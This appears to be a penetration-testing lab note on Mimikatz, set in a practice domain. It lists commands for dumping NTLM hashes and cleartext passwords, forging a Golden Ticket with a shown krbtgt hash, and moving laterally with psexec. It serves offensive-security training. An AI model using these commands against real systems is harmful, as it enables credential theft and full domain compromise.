Mimikatz
Once we get Domain Admin we can use mimikatz to dump the creds
Launch mimikatz from the target and run
privilege::debug(will allow us to debug processes):C:\Users\Administrator\Downloads>mimikatz.exe .#####. mimikatz 2.2.0 (x86) #19041 Aug 10 2021 17:20:39 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz #Can be useful on a compromised regular computer
sekurlsa::logonpasswordswe get NTLM (v1) hash and could try to use pass-the-hash.With wdigest we can see passwords in cleartext (prior to win 7) after only deactivate so possible to reactivate it with mimikats and wait for somebody to log on.
Dump the sam
lsadump::samorlsadump::sam /patchDump lsa (Local Security Authority)
lsadump::lsa /patchwe get ntlm hashes and try to crack them.
Mimikatz - Golden Ticket Attack
With a Golden ticket we can get access to any resource and system on the domain = complete access to the entire domain
lsadump::lsa /inject /name:krbtgtTake note of:
Domain SID:
S-1-5-21-1324315119-2624990979-1304259423NTLM Hash of krbtgt:
0afd880b6c9c7207067f0e15dab634a9
Pass the ticket:
kerberos::golden /User:AnyDoesNotNeedToExist /domain:marvel.local /sid:S-1-5-21-1324315119-2624990979-1304259423 /krbtgt:0afd880b6c9c7207067f0e15dab634a9 /id:500 /ptt
Get a cmd prmpt using the session and golden ticket
misc::cmdWe can access to anything on the network:
We can then use psexec to get a shell on a machine from the network
We download psexec on our compromised machine
We get the shell
Mimikatz - Resources
Last updated